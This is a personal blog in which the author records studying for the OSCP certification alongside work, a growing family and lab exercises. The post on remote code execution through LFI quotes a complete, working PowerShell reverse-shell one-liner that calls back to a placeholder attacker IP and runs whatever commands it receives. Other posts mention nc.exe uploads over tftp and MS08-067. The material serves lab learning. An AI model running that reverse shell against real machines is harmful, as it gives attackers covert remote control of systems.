I need to commit more

This journey is slowing fading. I need really need to commit more on doing my OSCP studying. I decided to try to hook up with a tutor to get BoFs down, but I am slowly losing my knowledge on the other areas.

The idea of sticking to just doing BoFs is not working. I will work on them tonight, come up with some questions for my tutor, and then work on HTBs that are like the OSCP. I think that is the best approach at this point. And now, it’s off to work. I am going to get to work a bit early to see if I can leave early. And I am out. πŸ™‚

Welcome, Andrew Hunter!

July 5, 2019 3:47 pm, 7 lbs, 13 oz.

Less than five days ago, this little dude entered into my life and my family. I am so blessed to be another father to a healthy kiddo. Words can’t describe how I feel now – this week I am off of work, just taking care of my amazing wife and newborn.

The second time around, I am not as worried about everything – I can just relax, and enjoy him. I have been studying – Mila is with my in-laws, giving me some time to be with the baby. So back to studying! (58 days left!)

Back to buffer overflows!

Oh man, it’s 69 days till the exam now?!?

My wife is due any day now with our next kiddo. I have a huge paper that I am editing. Then I need to start working on more work, then more work, then, wait, what about OSCP studying? Damn it. I am getting worried.

I am currently at Starbucks on a Friday night, away from my family TRYING to get through my paper. I feel like adulting is just getting through one hurdle just to get through the next one. Or maybe that’s just life. Whatever. My countdown clock that pops up when I open a new tab in chrome is just counting down the seconds till I bomb my OSCP if I don’t do something drastic.

Why are you looking at me like that BEAR!?!?!

And there goes the break timer. Back at it. Back at working. I still have a dream to get to my OSCP, but work really is doing a number at my studying time.

Hack The Box!

Hello, friend. So I have 8 days left in the PWK course. 2 hours/day is not realistic on the weekdays, so let’s go with 1 for now. It takes like 30 min to just get back into the material, so yeah.

I am going to spend the last few days here going through BoF. Today, I just reviewed nc and ncat. Basic stuff we are working with here people. But it’s been sometime I have worked with this stuff… even just grepping commands when working with enumeration… like not even pentesting.

Hack The Box, baby.

Anyway, I also got set up on HTB, and put my little sticker on the right for all to see. I am a noob!! Yay! Actually I rooted one active box today. Ridiculously simple to grab the flags, but it was a nice little win. I will be working on HTB to brush up skills post PWK. I also got a VIP because I can then go through retired machines and walk-throughs, etc.

As my wife always says to me, it’s not when you get your OSCP, is that you get your OSCP. I honestly hope I get it before I die. ugh.

The Journey is so long and I am so tired

This is getting ridiculous. It’s mainly my fault, but some of these exercises in the labs make me want to bang my head on the wall – really hard.

I am trying, and documenting the exercises. I have been working at them for over five months now, and yes, there are a few that have given me some hiccups. The ones that are hitting me hard are using sqlmap to obtain a shell on a target machine, using password attacks that were described in the book, and the Port Redirection/Tunneling. A lot of this is my fault for not going harder at the problems, and faster. For example, I did get the BoFs, but that was seriously like almost a half a year ago.

It looks like I have 12 days left in the labs, and I am definitely not going to get 10 boxes as root and document them all in that amount of time. Oh yeah, I also signed up for the test in September. Oh, and my wife and I are expecting a child in July.

To make matters worse, the prices are going up. So, it’s been real, but I am not sure if I am going to get this cert any time soon. I am not quite sure where to go from here. So let’s analyze, shall we?

Option one:
(γƒŽΰ² η›Šΰ² )γƒŽε½‘β”»β”β”»

Okay, let’s put the table back….
┳━┳ ヽ(ΰ² Ω„Νœΰ² )οΎ‰

Let’s try that again:

  1. Just spend every morning for 2 hours in the lab and the exercises. Try to do the areas that you didn’t get (the exercises that you didn’t get) and if you don’t get them, it’s no biggie. Just try to get back into the material, and hit it hard for the last 12 days.
  2. Post-time: You didn’t get the 5 points. You’ll get them after your first attempt at the exam. Because face it, you aren’t going to pass your first attempt. So here is where HTB and ippsec walkthroughs will help you. Step one, find some free BoFs and PRACTICE them. You know that’s a solid 20 points.
  3. Walkthrough the boxes in July. Start figuring out your methods. Just try to get as comfortable you can to at least try the exam in September. August, keep on going. Learn as much as you can from tutorials, the book, watch the videos again and relate them to HTBs.
  4. Fri, 06 Sep 2019, 05:00 (America/New_York), just try.
  5. Buy 30 days of lab – $300 bones. Finish up the exercises and the boxes. Get the 5 points, then schedule your exam again. Take it.

Remember what your wife said, it’s not how quickly you pass, but when you pass. Don’t give up, don’t get scared. Just go for it. You got this.

Finally, I am getting to Metasploit. Wow.

Well, I haven’t written for a while, but my daughter turned 4, my wife is expecting in July, and I am waking up pretty early to start studying these days. It’s a slow process, but I’ll get there. My plan is finish the labs, practice on hackthebox.eu and take the test in early September. I feel like failing the first time is simply a right of passage, so if that happens, at least I’ll know what to expect for the next time. I will get this cert. It might take time, but I am going to get it.

I am getting to the end of the labs, and I know now why metasploit is last and why you can only use it on one box – it’s pretty powerful. I did use it to pop my first shell on the lab machines – using 08-067 to exploit SMB!

This gif never gets old…

I didn’t know about meterpreter before the exploit, so I was hanging onto my shell for dear life, trying to upload a privilege escalation executable using certutil and tftp, but the shell was non-interactive and yeah… didn’t get far. But I started reading about meterpreter and all I could think about is how I am going to root that box now with my new knowledge.

The labs ask to perform a few things that I had to skip and gain my knowledge on – i.e., using metasploit to dump hashes and pass the hash. So now, I have to go back and finish up those labs. My lab report, w/o and writeups of pwning the 10 machines is almost at 200 pages. I am not going to fail to get those 5 points. Even if I have to come back and pay for more lab time.

I will have to say that I am really enjoying my time learning through PWK. People slam it for not being current (the exploits and the material), but I think that’s part of it – TRYING HARDER. Also, forget that man, it’s a VERY solid foundation for pen testing.

RCE using RFI attacks

Now that I have finished tackling LFI attacks, I am moving on to try to do a similar exploit, but rather than executing something from the victim machine, I will execute from my computer (the attacking machine) – hence “Remote File Inclusion” attacks, or RFI attacks.

I seem to be having some trouble with this one, and ultimately going with pausing on this and rethinking. My first thought was to serve php-reverse-shell from pentestmonkey from my machine, but it didn’t work.

I then backed up and thought to myself if the shell was working at all. So I decided to just upload the script on my victim machine and see if I could get a reverse shell. Well, my windows victim machine is super old and http cacheing wasn’t even letting me download the reverse shell to the machine over 80. I tried tftp, and nada. I finally zipped the script, and downloaded the .zip file.

Then I went ahead and unzipped on my victim machine and tried it. It would connect over netcat but then close the connection. So yeah, that’s not working. Honestly, at this point, I don’t even think that I should be downloading outside scripts to get the labs to work. So I am going to back up again, think about having nc.exe served from my machine, and execute a command to that executable. Then at least I can move on with the labs.

I do think there is value to getting the php-reverse-shell from pentestmonkey working though – it would be super valuable when I start popping boxes.

RCE using LFI attacks – happy St. Patty’s Day!

Top of the mornin’ to ya…

I like to wake up early to study. I mean, really early. Like today, I woke up at 3:30 am today to tackle this issue of gaining remote code execution (RCE) using Local File Inclusion attacks (LFI). I was hanging out at a coffee shop till pretty late last night, and couldn’t get it. This AM, I realized a few mistakes in my URL and it looked like I was able to upload nc.exe to the victim machine using tftp. Once I did this, I could execute nc.exe to call back to my machine.

This got me thinking a bit though, and I started wondering if I didn’t have tftp on my vulnerable windows box. So I looked up a few reverse shells here, but most of them were built for a victim linux machine (i.e. bash commands).

I found one that supposedly works with a powershell command:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

I also need to think a bit about this. I need to explore more about how to execute a command on a remote machine that would send a shell to my attacking machine (reverse shells, son). Ippsec’s channel is a go-to for a lot of this.

If I don’t have tftp to upload nc.exe on an LFI through php or another web application code, then I would need to get the reverse shell to work on one command – thought that PS would do it, but nada. Ippsec actually had trouble with this too on bashed, so actually, that means I might be doing it right.

Listening to Irish gigs right now – takes me back when I went to Ireland with my wife.

SlΓ‘inte!

…and I just extended my lab time.

This is a journey folks. And my journey includes a kid and a full time job. So right now, I am hanging around Chapter 13, Local File Inclusion vulnerabilities, and in order to pop 10 boxes and finish the labs, I am going to need the extra time.

One of things that they say in the exercise is that they quote Lincoln – “Give me six hours to chop down a tree and I will spend the first four sharpening the ax”. I think I just need a few more days, not hours, to sharpen. πŸ™‚

It’s a little tricky, and I really like how OffSec trains you in the labs to think about the cracks. Those cracks that can get you to root on a box. Off to LFIs!

Day 53 of the OSCP!!

I am slow – like really slow. I got through the enumeration section of the book pretty steadily, but now that I am working on Buffer Overflows, things are going slow and I am not as “quick” to pick back up the book.

I wake up at 4 am every day eager to study. After checking emails and reddit, I get in and make a little bit of progress. I really have to start putting more of my heart into this or else this OSCP is going to drag…

People take the test, what, like three times before they pass? I really need to get more wrapped in it, or this is going to be a really long process. I think I am going to buy 90 more days of lab to finish out the book, and then just go nuts on studying through hackthebox.eu and vulnhub. Take the test at the latest I can take it, and then if I fail, maybe 30 more days of lab and studying and then take it again.

I have a baby boy due in July so, yeah…. life happens, but it has always been my passion to pass this cert. I got this. Wish me luck.